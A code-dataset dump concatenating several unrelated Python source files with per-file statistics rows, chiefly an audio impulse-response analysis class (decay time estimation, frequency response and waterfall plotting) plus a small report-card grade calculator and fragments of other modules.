vibrato=property(get_vibrato,set_vibrato)
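# Wiring sketch -- the pygame setup below is an illustrative assumption, not
# part of this module:
#
#     pygame.init()
#     screen = pygame.display.set_mode((640, 360))
#     keyboard, vibrato = KeyboardView(screen), VibratoView(screen)
#     keyboard.pressed = {}    # the controller updates this each frame
#     keyboard.draw(); vibrato.draw()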
| 32.45283 | 98 | 0.618023 | 444 | 3,440 | 4.623874 | 0.272523 | 0.048709 | 0.013639 | 0.024842 | 0.452021 | 0.399415 | 0.399415 | 0.331223 | 0.276668 | 0.276668 | 0 | 0.026069 | 0.286337 | 3,440 | 106 | 99 | 32.45283 | 0.810183 | 0.250872 | 0 | 0.235294 | 0 | 0 | 0.031305 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.196078 | false | 0 | 0.019608 | 0.039216 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2ba4d83b84f13b1d2fe64bb14e4c12d52605ccc | 32,125 | py | Python | impulse_response.py | godlovesdavid/Impulcifer | c217a505a492174612e39245a742bb01058cc0af | [
"MIT"
] | 105 | 2018-12-08T18:18:03.000Z | 2022-03-21T16:57:27.000Z | impulse_response.py | godlovesdavid/Impulcifer | c217a505a492174612e39245a742bb01058cc0af | [
"MIT"
] | 61 | 2019-06-03T16:21:07.000Z | 2022-02-23T20:32:55.000Z | impulse_response.py | godlovesdavid/Impulcifer | c217a505a492174612e39245a742bb01058cc0af | [
"MIT"
] | 9 | 2020-01-29T10:10:27.000Z | 2022-02-24T20:26:53.000Z | # -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from matplotlib.mlab import specgram
from matplotlib.ticker import LinearLocator, FormatStrFormatter, FuncFormatter
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
from mpl_toolkits.axes_grid1 import make_axes_locatable
from scipy import signal, stats, ndimage, interpolate
import nnresample
from copy import deepcopy
from autoeq.frequency_response import FrequencyResponse
from utils import magnitude_response, get_ylim, running_mean
from constants import COLORS
class ImpulseResponse:
def __init__(self, data, fs, recording=None):
self.fs = fs
self.data = data
self.recording = recording
def copy(self):
return deepcopy(self)
def __len__(self):
"""Impulse response length in samples."""
return len(self.data)
def duration(self):
"""Impulse response duration in seconds."""
return len(self) / self.fs
def peak_index(self, start=0, end=None, peak_height=0.12589):
"""Finds the first high (negative or positive) peak in the impulse response wave form.
Args:
start: Index for start of search range
end: Index for end of search range
peak_height: Minimum peak height. Default is -18 dBFS
Returns:
Peak index to impulse response data
"""
if end is None:
end = len(self.data)
# Peak height threshold, relative to the data maximum value
# Copy to avoid manipulating the original data here
data = self.data.copy()
# Limit search to given range
data = data[start:end]
# Normalize to 1.0
data /= np.max(np.abs(data))
# Find positive peaks
peaks_pos, properties = signal.find_peaks(data, height=peak_height)
# Find negative peaks that are at least
peaks_neg, _ = signal.find_peaks(data * -1.0, height=peak_height)
# Combine positive and negative peaks
peaks = np.concatenate([peaks_pos, peaks_neg])
# Add start delta to peak indices
peaks += start
# Return the first one
return np.min(peaks)
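# Usage sketch -- obtaining `data` and `fs` is handled by the recording
# pipeline elsewhere in the project:
#
#     ir = ImpulseResponse(data, fs)
#     onset = ir.peak_index()   # first peak above ~-18 dBFS (0.12589)
#     t0 = onset / ir.fs        # onset time in seconds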
def decay_params(self):
"""Determines decay parameters with Lundeby method
https://www.ingentaconnect.com/content/dav/aaua/1995/00000081/00000004/art00009
http://users.spa.aalto.fi/mak/PUB/AES_Modal9992.pdf
Returns:
- peak_ind: Fundamental starting index
- knee_point_ind: Index where decay reaches noise floor
- noise_floor: Noise floor in dBFS; since the data is normalized to the peak, this is also the (negative) peak-to-noise ratio
- window_size: Averaging window size as determined by Lundeby method
"""
peak_index = self.peak_index()
# 1. The squared impulse response is averaged into local time intervals in the range of 10–50 ms,
# to yield a smooth curve without losing short decays.
data = self.data.copy()
# From peak to 2 seconds after the peak
data = data[peak_index:min(peak_index + 2 * self.fs, len(self))]
data /= np.max(np.abs(data)) # Normalize
squared = data ** 2 # Squared impulse response starting from the peak
t_squared = np.linspace(0, len(squared) / self.fs, len(squared)) # Time stamps starting from peak
wd = 0.03 # Window duration, let's start with 30 ms
n = int(len(squared) / self.fs / wd) # Number of time windows
w = int(len(squared) / n) # Width of a single time window
t_windows = np.arange(n) * wd + wd / 2 # Timestamps for the window centers
windows = squared.copy() # Copy to avoid modifying the original
windows = np.reshape(windows[:n * w], (n, w)) # Split into time windows, one window per row
windows = np.mean(windows, axis=1) # Average each time window
windows = 10 * np.log10(windows) # dB
# 2. A first estimate for the background noise level is determined from a time segment containing the last
# 10 % of the impulse response. This gives a reasonable statistical selection without a large systematic error,
# if the decay continues to the end of the response.
tail = squared[int(-0.1 * len(squared)):] # Last 10 %
noise_floor = 10 * np.log10(np.mean(tail)) # Mean as dBs, not mean of dB values
# 3. The decay slope is estimated using linear regression between the time interval containing the response
# 0 dB peak, and the first interval 5–10 dB above the background noise level.
slope_end = np.argwhere(windows <= noise_floor + 10)[0, 0] - 1 # Index previous to the first below 10 dB
slope, intercept, _, _, _ = stats.linregress(t_windows[:slope_end], windows[:slope_end])
# 4. A preliminary knee point is determined at the intersection of the decay slope and the background noise
# level.
# Everything falls apart if this is not in the decay range but in the tail
        # This can happen when there is a long tail which has a plateau first but then starts to decay again;
        # in that case the noise floor estimated from the end of the impulse response is far below the knee point.
# Should be preventable by truncating the impulse response to N seconds after the peak
knee_point_time = (noise_floor - intercept) / slope
# 5. A new time interval length is calculated according to the calculated slope, so that there are 3–10
# intervals per 10 dB of decay.
n_windows_per_10dB = 3
wd = 10 / (abs(slope) * n_windows_per_10dB)
n = int(len(squared) / self.fs / wd) # Number of time windows
w = int(len(squared) / n) # Width of a single time window
t_windows = np.arange(n) * wd + wd / 2 # Time window center time stamps
# 6. The squared impulse is averaged into the new local time intervals.
windows = squared.copy()
windows = np.reshape(windows[:n * w], (n, w)) # Split into time windows
windows = np.mean(windows, axis=1) # Average each time window
windows = 10 * np.log10(windows) # dB
try:
knee_point_index = np.argwhere(t_windows >= knee_point_time)[0, 0]
knee_point_value = windows[knee_point_index]
        except IndexError:
# Probably tail has already been cropped
return peak_index, len(self), noise_floor, w
# print(f' Knee point: {knee_point_value:.2f} dB @ {knee_point_time * 1000:.0f} ms')
        # Steps 7–9 are iterated until the knee_point is found to converge (max. 5 iterations).
for i in range(5):
# print(f' iter {i}')
# 7. The background noise level is determined again. The evaluated noise segment should start from a
# point corresponding to 5–10 dB of decay after the knee_point, or a minimum of 10 % of the total
# response length.
try:
noise_floor_start_index = np.argwhere(windows <= knee_point_value - 5)[0, 0]
except IndexError:
break
noise_floor_start_time = max(t_windows[noise_floor_start_index], 0.1 * self.duration())
# Protection against over shooting the impulse response end, in case the IR has been truncated already
# In that case the noise floor will be calculated from the last half of the last window
noise_floor_start_time = min(noise_floor_start_time, t_windows[-1])
# noise_floor_end_time = noise_floor_start_time + 0.1 * len(squared) / ir.fs # TODO: Until the very end?
# Noise floor estimation range ends one full decay time after the start, truncated to the IR length
noise_floor_end_time = min(noise_floor_start_time + knee_point_time, self.duration())
noise_floor = np.mean(squared[np.logical_and(
t_squared >= noise_floor_start_time,
t_squared <= noise_floor_end_time
)])
noise_floor = 10 * np.log10(noise_floor) # dB
# print(f' Noise floor '
# f'({(noise_floor_start_time + peak_index / self.fs) * 1000:.0f} ms -> '
# f'{(noise_floor_end_time + peak_index / self.fs) * 1000:.0f} ms): '
# f'{noise_floor}')
# 8. The late decay slope is estimated for a dynamic range of 10–20 dB, starting from a point 5–10 dB above
# the noise level.
slope_end_headroom = 8
slope_dynamic_range = 20
try:
slope_end = np.argwhere(windows <= noise_floor + slope_end_headroom)[0, 0] - 1 # 8 dB above noise level
slope_start = np.argwhere(windows <= noise_floor + (slope_end_headroom + slope_dynamic_range))[0, 0] - 1
late_slope, late_intercept, _, _, _ = stats.linregress(
t_windows[slope_start:slope_end],
windows[slope_start:slope_end]
)
except (IndexError, ValueError):
# Problems with already cropped IR tail
break
# print(f' Late slope {t_windows[slope_start] * 1000:.0f} ms -> {t_windows[slope_end] * 1000:.0f} ms: {late_slope:.1f}t + {late_intercept:.2f}')
# 9. A new knee_point is found.
knee_point_time = (noise_floor - late_intercept) / late_slope
if knee_point_time > t_windows[-1]:
knee_point_time = t_windows[-1]
break
knee_point_index = np.argwhere(t_windows >= knee_point_time)[0, 0]
knee_point_value = windows[knee_point_index]
# print(f' Knee point: {knee_point_value:.2f} dB @ {knee_point_time * 1000:.0f} ms')
            # Index of first window which comes at or after the knee point time
new_knee_point_index = np.argwhere(t_windows >= knee_point_time)[0, 0]
if new_knee_point_index == knee_point_index:
# Converged
knee_point_index = new_knee_point_index
break
else:
knee_point_index = new_knee_point_index
# Until this point knee_point_index has been an index to windows,
# find the index to impulse response data
knee_point_time = t_windows[knee_point_index]
knee_point_index = np.argwhere(t_squared >= knee_point_time)[0, 0]
return peak_index, peak_index + knee_point_index, noise_floor, w
def decay_times(self, peak_ind=None, knee_point_ind=None, noise_floor=None, window_size=None):
"""Calculates decay times EDT, RT20, RT30, RT60
Args:
peak_ind: Peak index as returned by `decay_params()`. Optional.
knee_point_ind: Knee point index as returned by `decay_params()`. Optional.
noise_floor: Noise floor as returned by `decay_params()`. Optional.
window_size: Moving average window size as returned by `decay_params()`. Optional.
Returns:
- EDT, None if SNR < 10 dB
- RT20, None if SNR < 35 dB
- RT30, None if SNR < 45 dB
- RT60, None if SNR < 75 dB
"""
if peak_ind is None or knee_point_ind is None or noise_floor is None:
peak_ind, knee_point_ind, noise_floor, window_size = self.decay_params()
t = np.linspace(0, self.duration(), len(self))
        knee_point_ind -= peak_ind
        data = self.data.copy()
        data = data[peak_ind:]
data /= np.max(np.abs(data))
        # analytical = np.abs(signal.hilbert(data))  # Hilbert doesn't work well with broadband signals
analytical = np.abs(data)
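        # Schroeder backward integration: s(t) = 10*log10( sum_{tau=t..T} p^2(tau) / sum_{tau=0..T} p^2(tau) ),
        # implemented below as a reversed cumulative sum of the squared envelope normalized by the total energy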
schroeder = np.cumsum(analytical[knee_point_ind::-1] ** 2 / np.sum(analytical[:knee_point_ind] ** 2))[:0:-1]
schroeder = 10 * np.log10(schroeder)
# Moving average of the squared impulse response
avg = self.data.copy()
# Truncate data to avoid unnecessary computations
# Ideally avg_head is the half window size but this might not be possible if the IR has been truncated already
# and the peak is closer to the start than half window
avg_head = min((window_size // 2), peak_ind)
avg_tail = min((window_size // 2), len(avg) - (peak_ind + knee_point_ind))
# We need an index offset for average curve if the avg_head is not half window
avg_offset = window_size // 2 - avg_head
avg = avg[peak_ind - avg_head:peak_ind + knee_point_ind + avg_tail] # Truncate
avg /= np.max(np.abs(avg)) # Normalize
avg = avg ** 2
avg = running_mean(avg, window_size)
avg = 10 * np.log10(avg + 1e-18)
# Find offset which minimizes difference between Schroeder backward integral and the moving average
# ie. offset which moves Schroeder curve to same vertical position as the decay power curve
# Limit the range 10% -> 90% of Schroeder and avg start and end
fit_start = max(int(len(schroeder) * 0.1), avg_offset) # avg could start after 10% of Schroeder
fit_end = min(int(len(schroeder) * 0.9), avg_offset + (len(avg))) # avg could end before 90% of Schroeder
offset = np.mean(
schroeder[fit_start:fit_end] -
avg[fit_start - avg_offset:fit_end - avg_offset] # Shift avg indexes by the offset length
)
decay_times = dict()
limits = [(-1, -10, -10, 'EDT'), (-5, -25, -20, 'RT20'), (-5, -35, -30, 'RT30'), (-5, -65, -60, 'RT60')]
for start_target, end_target, decay_target, name in limits:
decay_times[name] = None
if end_target < noise_floor + offset + 10:
# There has to be at least 10 dB of headroom between the end target point and noise floor,
# in this case there is not. Current decay time shall remain undefined.
continue
try:
start = np.argwhere(schroeder <= start_target)[0, 0]
end = np.argwhere(schroeder <= end_target)[0, 0]
            except IndexError:
# Targets not found on the Schroeder curve
continue
slope, intercept, _, _, _ = stats.linregress(t[start:end], schroeder[start:end])
decay_times[name] = decay_target / slope
return decay_times['EDT'], decay_times['RT20'], decay_times['RT30'], decay_times['RT60']
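    # Usage sketch (assuming `ir` is an instance of this class):
    #   peak_ind, knee_ind, noise_floor, window = ir.decay_params()
    #   edt, rt20, rt30, rt60 = ir.decay_times(peak_ind, knee_ind, noise_floor, window)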
def crop_head(self, head_ms=1):
"""Crops away head."""
self.data = self.data[self.peak_index() - int(self.fs * head_ms / 1000):]
def equalize(self, fir):
"""Equalizes this impulse response with give FIR filter.
Args:
fir: FIR filter as an single dimensional array
Returns:
None
"""
self.data = signal.convolve(self.data, fir, mode='full')
def resample(self, fs):
"""Resamples this impulse response to the given sampling rate."""
self.data = nnresample.resample(self.data, fs, self.fs)
self.fs = fs
def convolve(self, x):
"""Convolves input data with this impulse response
Args:
x: Input data to be convolved
Returns:
Convolved data
"""
return signal.convolve(x, self.data, mode='full')
def adjust_decay(self, target):
"""Adjusts decay time in place.
Args:
target: Target 60 dB decay time in seconds
Returns:
None
"""
peak_index, knee_point_index, _, _ = self.decay_params()
edt, rt20, rt30, rt60 = self.decay_times()
rt_slope = None
# Finds largest available decay time parameter
for rt_time, rt_level in [(edt, -10), (rt20, -20), (rt30, -30), (rt60, -60)]:
if not rt_time:
break
rt_slope = rt_level / rt_time
        target_slope = -60 / target  # Target dB/s
        if rt_slope is None or target_slope > rt_slope:
            # No decay time estimate is available, or the target decay is longer than the current one;
            # we're not going to adjust decay and noise floor up
            return
knee_point_time = knee_point_index / self.fs
knee_point_level = rt_slope * knee_point_time # Extrapolated level at knee point
target_level = target_slope * knee_point_time # Target level at knee point
window_level = target_level - knee_point_level # Adjustment level at knee point
window_start = peak_index + 2 * (self.fs // 1000)
half_window = knee_point_index - window_start # Half Hanning window length, from peak to knee
window = np.concatenate([ # Adjustment window
np.ones(window_start), # Start with ones until peak
signal.windows.hann(half_window * 2)[half_window:], # Slope down to knee point
np.zeros(len(self) - knee_point_index) # Fill with zeros to full length
]) - 1.0 # Slopes down from 0.0 to -1.0
window *= -window_level # Scale with adjustment level at knee point
window = 10 ** (window / 20) # Linear scale
        self.data *= window  # Scale impulse response data with the window
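    # Adjustment math: with measured decay slope s (dB/s, from the longest available RT estimate)
    # and target slope -60 / target, the gain window is 0 dB at the peak and
    # (target_slope - s) * t_knee dB at the knee point, shaped as a half Hann window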
def magnitude_response(self):
"""Calculates magnitude response for the data."""
return magnitude_response(self.data, self.fs)
def frequency_response(self):
"""Creates FrequencyResponse instance."""
f, m = self.magnitude_response()
n = self.fs / 2 / 4 # 4 Hz resolution
step = int(len(f) / n)
fr = FrequencyResponse(name='Frequency response', frequency=f[1::step], raw=m[1::step])
fr.interpolate(f_step=1.01, f_min=10, f_max=self.fs / 2)
return fr
def plot(self,
fig=None,
ax=None,
plot_file_path=None,
plot_recording=True,
plot_spectrogram=True,
plot_ir=True,
plot_fr=True,
plot_decay=True,
plot_waterfall=True):
"""Plots all plots into the same figure
Args:
fig: Figure instance
ax: Axes instance, must have 2 rows and 3 columns
plot_file_path: Path to a file for saving the plot
plot_recording: Plot recording waveform?
plot_spectrogram: Plot recording spectrogram?
plot_ir: Plot impulse response?
plot_fr: Plot frequency response?
plot_decay: Plot decay curve?
plot_waterfall: Plot waterfall graph?
Returns:
Figure
"""
if fig is None:
# Create figure and axises for the plots
fig = plt.figure()
fig.set_size_inches(22, 10)
ax = []
for i in range(5):
ax.append(fig.add_subplot(2, 3, i + 1))
ax.append(fig.add_subplot(2, 3, 6, projection='3d'))
ax = np.vstack([ax[:3], ax[3:]])
if plot_recording:
self.plot_recording(fig=fig, ax=ax[0, 0])
if plot_spectrogram:
self.plot_spectrogram(fig=fig, ax=ax[1, 0])
if plot_ir:
self.plot_ir(fig=fig, ax=ax[0, 1])
if plot_fr:
self.plot_fr(fig=fig, ax=ax[1, 1])
if plot_decay:
self.plot_decay(fig=fig, ax=ax[0, 2])
if plot_waterfall:
self.plot_waterfall(fig=fig, ax=ax[1, 2])
if plot_file_path:
fig.savefig(plot_file_path)
return fig
def plot_recording(self, fig=None, ax=None, plot_file_path=None):
"""Plots recording wave form
Args:
fig: Figure instance
ax: Axes instance
plot_file_path: Path to a file for saving the plot
Returns:
- Figure
- Axes
"""
if self.recording is None or len(np.nonzero(self.recording)[0]) == 0:
return
if fig is None:
fig, ax = plt.subplots()
t = np.linspace(0, len(self.recording) / self.fs, len(self.recording))
ax.plot(t, self.recording, color=COLORS['blue'], linewidth=0.5)
ax.grid(True)
ax.set_xlabel('Time (s)')
ax.set_ylabel('Amplitude')
ax.set_title('Sine Sweep')
# Save image
if plot_file_path:
fig.savefig(plot_file_path)
return fig, ax
def plot_spectrogram(self, fig=None, ax=None, plot_file_path=None, f_res=10, n_segments=200):
"""Plots spectrogram for a logarithmic sine sweep recording.
Args:
fig: Figure instance
ax: Axis instance
plot_file_path: Path to a file for saving the plot
f_res: Frequency resolution (step) in Hertz
n_segments: Number of segments in time axis
Returns:
- Figure
- Axis
"""
if self.recording is None or len(np.nonzero(self.recording)[0]) == 0:
return
if fig is None:
fig, ax = plt.subplots()
# Window length in samples
nfft = int(self.fs / f_res)
# Overlapping in samples
noverlap = int(nfft - (len(self.recording) - nfft) / n_segments)
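        # The overlap above makes the segment step (nfft - noverlap) equal to
        # (len(recording) - nfft) / n_segments, so specgram yields roughly
        # n_segments time columns regardless of the recording length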
# Get spectrogram data
spectrum, freqs, t = specgram(self.recording, Fs=self.fs, NFFT=nfft, noverlap=noverlap, mode='psd')
# Remove zero frequency
f = freqs[1:]
z = spectrum[1:, :]
# Logarithmic power
z = 10 * np.log10(z)
# Create spectrogram image
t, f = np.meshgrid(t, f)
cs = ax.pcolormesh(t, f, z, cmap='gnuplot2', vmin=-150, shading='auto')
divider = make_axes_locatable(ax)
cax = divider.append_axes('right', size='5%', pad=0.05)
fig.colorbar(cs, cax=cax)
ax.semilogy()
ax.yaxis.set_major_formatter(ticker.StrMethodFormatter('{x:.0f}'))
ax.set_xlabel('Time (s)')
ax.set_ylabel('Frequency (Hz)')
ax.set_title('Spectrogram')
# Save image
if plot_file_path:
fig.savefig(plot_file_path)
return fig, ax
def plot_ir(self, fig=None, ax=None, start=0.0, end=None, plot_file_path=None):
"""Plots impulse response wave form.
Args:
fig: Figure instance
ax: Axis instance
start: Start of the plot in seconds
end: End of the plot in seconds
plot_file_path: Path to a file for saving the plot
Returns:
None
"""
if end is None:
end = len(self.data) / self.fs
ir = self.data[int(start * self.fs):int(end * self.fs)]
if fig is None:
fig, ax = plt.subplots()
t = np.arange(start * 1000, start * 1000 + 1000 / self.fs * len(ir), 1000 / self.fs)
ax.plot(t, ir, color=COLORS['blue'], linewidth=0.5)
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Amplitude')
ax.grid(True)
        ax.set_title('Impulse response')
if plot_file_path:
fig.savefig(plot_file_path)
return fig, ax
def plot_fr(self,
fr=None,
fig=None,
ax=None,
plot_file_path=None,
plot_raw=True,
raw_color='#7db4db',
plot_smoothed=True,
smoothed_color='#1f77b4',
plot_error=True,
error_color='#dd8081',
plot_error_smoothed=True,
error_smoothed_color='#d62728',
plot_target=True,
target_color='#ecdef9',
plot_equalization=True,
equalization_color='#2ca02c',
plot_equalized=True,
equalized_color='#680fb9',
fix_ylim=False):
"""Plots frequency response
Args:
            fr: FrequencyResponse instance. Useful for passing an instance with target, error, equalization etc...
fig: Figure instance
ax: Axes instance
plot_file_path: Path to a file for saving the plot
plot_raw: Include raw curve?
raw_color: Color of raw curve
plot_smoothed: Include smoothed curve?
smoothed_color: Color of smoothed curve
plot_error: Include unsmoothed error curve?
error_color: Color of error curve
plot_error_smoothed: Include smoothed error curve?
error_smoothed_color: Color of smoothed error curve
plot_target: Include target curve?
target_color: Color of target curve
plot_equalization: Include equalization curve?
equalization_color: Color of equalization curve
plot_equalized: Include equalized curve?
equalized_color: Color of equalized curve
fix_ylim: Fix Y-axis limits calculation?
Returns:
- Figure
- Axes
"""
if fr is None:
fr = self.frequency_response()
fr.smoothen_fractional_octave(window_size=1/3, treble_f_lower=20000, treble_f_upper=23999)
if fig is None:
fig, ax = plt.subplots()
ax.set_xlabel('Frequency (Hz)')
ax.semilogx()
ax.set_xlim([20, 20e3])
ax.set_ylabel('Amplitude (dB)')
ax.set_title(fr.name)
ax.grid(True, which='major')
ax.grid(True, which='minor')
ax.xaxis.set_major_formatter(ticker.StrMethodFormatter('{x:.0f}'))
legend = []
v = []
sl = np.logical_and(fr.frequency >= 20, fr.frequency <= 20000)
if plot_target and len(fr.target):
ax.plot(fr.frequency, fr.target, linewidth=5, color=target_color)
legend.append('Target')
v.append(fr.target[sl])
if plot_raw and len(fr.raw):
ax.plot(fr.frequency, fr.raw, linewidth=0.5, color=raw_color)
legend.append('Raw')
v.append(fr.raw[sl])
if plot_error and len(fr.error):
ax.plot(fr.frequency, fr.error, linewidth=0.5, color=error_color)
legend.append('Error')
v.append(fr.error[sl])
if plot_smoothed and len(fr.smoothed):
ax.plot(fr.frequency, fr.smoothed, linewidth=1, color=smoothed_color)
legend.append('Raw Smoothed')
v.append(fr.smoothed[sl])
if plot_error_smoothed and len(fr.error_smoothed):
ax.plot(fr.frequency, fr.error_smoothed, linewidth=1, color=error_smoothed_color)
legend.append('Error Smoothed')
v.append(fr.error_smoothed[sl])
if plot_equalization and len(fr.equalization):
ax.plot(fr.frequency, fr.equalization, linewidth=1, color=equalization_color)
legend.append('Equalization')
v.append(fr.equalization[sl])
if plot_equalized and len(fr.equalized_raw) and not len(fr.equalized_smoothed):
ax.plot(fr.frequency, fr.equalized_raw, linewidth=1, color=equalized_color)
legend.append('Equalized raw')
v.append(fr.equalized_raw[sl])
if plot_equalized and len(fr.equalized_smoothed):
ax.plot(fr.frequency, fr.equalized_smoothed, linewidth=1, color=equalized_color)
legend.append('Equalized smoothed')
v.append(fr.equalized_smoothed[sl])
if fix_ylim:
# Y axis limits
lower, upper = get_ylim(v)
ax.set_ylim([lower, upper])
ax.legend(legend, fontsize=8)
if plot_file_path:
fig.savefig(plot_file_path)
return fig, ax
def plot_decay(self, fig=None, ax=None, plot_file_path=None):
"""Plots decay graph.
Args:
fig: Figure instance. New will be created if None is passed.
ax: Axis instance. New will be created if None is passed to fig.
plot_file_path: Save plot figure to a file.
Returns:
- Figure
- Axes
"""
if fig is None:
fig, ax = plt.subplots()
peak_ind, knee_point_ind, noise_floor, window_size = self.decay_params()
start = max(0, (peak_ind - 2 * (knee_point_ind - peak_ind)))
end = min(len(self), (peak_ind + 2 * (knee_point_ind - peak_ind)))
t = np.arange(start, end) / self.fs
squared = self.data.copy()
squared /= np.max(np.abs(squared))
squared = squared[start:end] ** 2
avg = running_mean(squared, window_size)
squared = 10 * np.log10(squared + 1e-24)
avg = 10 * np.log10(avg + 1e-24)
ax.plot(t * 1000, squared, color=COLORS['lightblue'], label='Squared impulse response')
ax.plot(
t[window_size // 2:window_size // 2 + len(avg)] * 1000, avg, color=COLORS['blue'],
label=f'{window_size / self.fs *1000:.0f} ms moving average'
)
ax.set_ylim([np.min(avg) * 1.2, 0])
ax.set_xlim([
start / self.fs * 1000,
end / self.fs * 1000
])
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Amplitude (dBr)')
ax.grid(True, which='major')
ax.set_title('Decay')
ax.legend(loc='upper right')
if plot_file_path:
fig.savefig(plot_file_path)
return fig, ax
def plot_waterfall(self, fig=None, ax=None):
""""""
if fig is None:
fig, ax = plt.subplots()
z_min = -100
# Window
window_duration = 0.01 # TODO
nfft = min(int(self.fs * window_duration), int(len(self.data) / 10))
noverlap = int(nfft * 0.9) # 90% overlap TODO
ascend_ms = 10 # 10 ms ascending window
ascend = int(ascend_ms / 1000 * self.fs)
        plateau = int((nfft - ascend) * 3 / 4)  # 75%
        descend = nfft - ascend - plateau  # 25%
        window = np.concatenate([
            signal.windows.hann(ascend * 2)[:ascend],
            np.ones(plateau),
            signal.windows.hann(descend * 2)[descend:]
])
# Crop from 10ms before peak to start of tail
peak_ind, tail_ind, noise_floor, _ = self.decay_params()
start = max(int(peak_ind - self.fs * 0.01), 0)
# Stop index is greater of 1s after peak or 1 FFT window after tail
stop = min(int(round(max(peak_ind + self.fs * 1, tail_ind + nfft))), len(self.data))
data = self.data[start:stop]
# Get spectrogram data
spectrum, freqs, t = specgram(data, Fs=self.fs, NFFT=nfft, noverlap=noverlap, mode='magnitude', window=window)
# Remove 0 Hz component
spectrum = spectrum[1:, :]
freqs = freqs[1:]
        # Interpolate to logarithmic frequency scale
f_max = self.fs / 2
f_min = 10
step = 1.03
f = np.array([f_min * step ** i for i in range(int(np.log(f_max / f_min) / np.log(step)))])
log_f_spec = np.ones((len(f), spectrum.shape[1]))
for i in range(spectrum.shape[1]):
interpolator = interpolate.InterpolatedUnivariateSpline(np.log10(freqs), spectrum[:, i], k=1)
log_f_spec[:, i] = interpolator(np.log10(f))
z = log_f_spec
f = np.log10(f)
# Normalize and turn to dB scale
z /= np.max(z)
z = np.clip(z, 10**(z_min/20), np.max(z))
z = 20 * np.log10(z)
# Smoothen
z = ndimage.uniform_filter(z, size=3, mode='constant')
t, f = np.meshgrid(t, f)
# Smoothing creates "walls", remove them
t = t[1:-1, :-1] * 1000 # Milliseconds
f = f[1:-1, :-1]
z = z[1:-1, :-1]
# Surface plot
ax.plot_surface(t, f, z, rcount=len(t), ccount=len(f), cmap='magma', antialiased=True, vmin=z_min, vmax=0)
# Z axis
ax.set_zlim([z_min, 0])
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
# X axis
ax.set_xlim([0, None])
ax.set_xlabel('Time (ms)')
# Y axis
ax.set_ylim(np.log10([20, 20000]))
ax.set_ylabel('Frequency (Hz)')
ax.yaxis.set_major_formatter(FuncFormatter(lambda x, p: f'{10 ** x:.0f}'))
# Orient
ax.view_init(30, 30)
return fig, ax
| 41.883963 | 161 | 0.596451 | 4,328 | 32,125 | 4.287431 | 0.142098 | 0.032496 | 0.015521 | 0.007329 | 0.27673 | 0.227743 | 0.178056 | 0.147769 | 0.118075 | 0.104441 | 0 | 0.028502 | 0.30649 | 32,125 | 766 | 162 | 41.938642 | 0.804076 | 0.313805 | 0 | 0.248276 | 0 | 0 | 0.026902 | 0 | 0 | 0 | 0 | 0.002611 | 0 | 1 | 0.048276 | false | 0 | 0.029885 | 0.002299 | 0.126437 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2bb9de9c7b1a8928e1670e934477a453bb8d2a1 | 680 | py | Python | Program Hitung Nilai Raport.py | Rizalgente/Program-hitung-nilai-raport | 0044bee8dfb28e9d16f0a4fa5e544ac3a16b9aa6 | [
"MIT"
] | null | null | null | Program Hitung Nilai Raport.py | Rizalgente/Program-hitung-nilai-raport | 0044bee8dfb28e9d16f0a4fa5e544ac3a16b9aa6 | [
"MIT"
] | null | null | null | Program Hitung Nilai Raport.py | Rizalgente/Program-hitung-nilai-raport | 0044bee8dfb28e9d16f0a4fa5e544ac3a16b9aa6 | [
"MIT"
] | null | null | null | print('====REPORT CARD GRADE CALCULATOR====\n'.center(50))
while True:
    nilai_ujian1 = int(input("# Enter the first exam score: "))
    nilai_ujian2 = int(input("# Enter the second exam score: "))
    nilai_ujian3 = int(input("# Enter the third exam score: "))
    hasil = (nilai_ujian1+nilai_ujian2+nilai_ujian3) / 3
    print("The total score you obtained is: {}".format(hasil))
    nilai = hasil
    if nilai >= 95:
        print("Your grade is A\n")
    elif nilai >= 80:
        print("Your grade is B\n")
    elif nilai >= 65:
        print("Your grade is C\n")
    elif nilai >= 50:
        print("Your grade is D\n")
    else:
        print("Your grade is E\n")
| 32.380952 | 68 | 0.602941 | 92 | 680 | 4.391304 | 0.434783 | 0.123762 | 0.173267 | 0.148515 | 0.185644 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033399 | 0.251471 | 680 | 20 | 69 | 34 | 0.760314 | 0 | 0 | 0 | 0 | 0 | 0.35 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.368421 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2bc368e54ecd0e6a0a4e46893e6e90b38f8e219 | 6,903 | py | Python | mayan/apps/documents/models/document_type_models.py | wan1869/wan-edms | e2a2c8d9e8dd60c6ea716ac5a963a71bcc326a6b | [
"Apache-2.0"
] | 1 | 2021-02-24T15:03:23.000Z | 2021-02-24T15:03:23.000Z | mayan/apps/documents/models/document_type_models.py | ass-a2s/Mayan-EDMS | 5769f26abc56f92f8edb9d311cabf659dc0535c1 | [
"Apache-2.0"
] | null | null | null | mayan/apps/documents/models/document_type_models.py | ass-a2s/Mayan-EDMS | 5769f26abc56f92f8edb9d311cabf659dc0535c1 | [
"Apache-2.0"
] | 1 | 2021-04-30T09:44:14.000Z | 2021-04-30T09:44:14.000Z | import logging
from django.apps import apps
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
